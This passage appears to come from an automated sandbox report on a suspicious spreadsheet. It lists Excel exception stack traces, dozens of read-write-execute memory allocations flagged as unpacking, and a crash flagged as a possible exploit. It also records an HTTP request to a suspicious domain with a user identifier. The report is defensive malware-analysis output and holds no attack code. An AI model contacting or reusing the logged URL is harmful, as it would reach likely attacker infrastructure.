ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc004f011 exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 4450704 registers.edi: 4450868 registers.eax: 4450704 registers.ebp: 4450784 registers.edx: 0 registers.ebx: 4451920 registers.esi: 3221549073 registers.ecx: 2147483648	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 30, 2023, 5:46 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x6d0133cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6d025dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6d013b21
SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x6d022074
SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x657885c7
??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x6e40dd28
DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x6db0c415
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6d5190c4
_MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6d519076
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6d50724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6d480f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6d47dc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6d47d991
_MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6d47c60d
_MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6d472ce6
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x8007007b
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 104984844
registers.edi: 104985008
registers.eax: 104984844
registers.ebp: 104984924
registers.edx: 0
registers.ebx: 104986060
registers.esi: 2147942523
registers.ecx: 2147483648

__exception__

Oct. 30, 2023, 5:46 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x6d0133cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6d025dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6d013b21
SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x6d023102
SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x657af7d0
??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x6e40e0ed
??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x6e40e2cf
DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x6ded4871
DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x6ded48ef
_MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6d6c4ea0
_MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6da6d7ab
??0OdfStgParams@@QAE@XZ+0xed734 mso+0xff063a @ 0x6e44063a
DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x6db0c517
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6d5190c4
_MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6d518ff0
_MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6d507292
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6d50724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6d480f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6d47dc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6d47d991
_MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6d506de4
_MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6d506d1b
_MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6d503f5a
_MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6d504b41
_MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6d503a43
MdCallBack-0x9c7613 excel+0x2651a @ 0x2f0b651a
MdCallBack-0x9c9bd0 excel+0x23f5d @ 0x2f0b3f5d
MdCallBack-0x9e98e2 excel+0x424b @ 0x2f09424b
MdCallBack-0x9e9c23 excel+0x3f0a @ 0x2f093f0a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 4450704
registers.edi: 4450868
registers.eax: 4450704
registers.ebp: 4450784
registers.edx: 0
registers.ebx: 4451920
registers.esi: 3221549073
registers.ecx: 2147483648

Performs some HTTP requests (1 event)

request

GET http://app.documentoffice.club/salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE

Allocates read-write-execute memory (usually to unpack itself) (50 out of 345 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02910000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73961000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73962000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02682000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02683000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02684000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02685000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02686000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bc1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bc2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bc3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bc4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bc5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bc6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bc7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bc8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bc9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bcb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bcc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bcd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bce000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bcf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bd1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bd2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bd3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 30, 2023, 5:45 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bd4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process EXCEL.EXE with pid 1624 crashed
__exception__ Oct. 30, 2023, 5:46 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a SLClose-0x28e osppc+0x33cf @ 0x6d0133cf SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6d025dba SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6d013b21 SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x6d022074 SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x657885c7 ??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x6e40dd28 DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x6db0c415 _MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6d5190c4 _MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6d519076 _MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6d50724d _MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6d480f14 _MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6d47dc21 _MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6d47d991 _MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6d47c60d _MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6d472ce6 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x8007007b exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 104984844 registers.edi: 104985008 registers.eax: 104984844 registers.ebp: 104984924 registers.edx: 0 registers.ebx: 104986060 registers.esi: 2147942523 registers.ecx: 2147483648	1	0	0
__exception__ Oct. 30, 2023, 5:46 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a SLClose-0x28e osppc+0x33cf @ 0x6d0133cf SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6d025dba SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6d013b21 SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x6d023102 SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x657af7d0 ??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x6e40e0ed ??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x6e40e2cf DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x6ded4871 DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x6ded48ef _MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6d6c4ea0 _MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6da6d7ab ??0OdfStgParams@@QAE@XZ+0xed734 mso+0xff063a @ 0x6e44063a DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x6db0c517 _MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6d5190c4 _MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6d518ff0 _MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6d507292 _MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6d50724d _MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6d480f14 _MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6d47dc21 _MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6d47d991 _MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 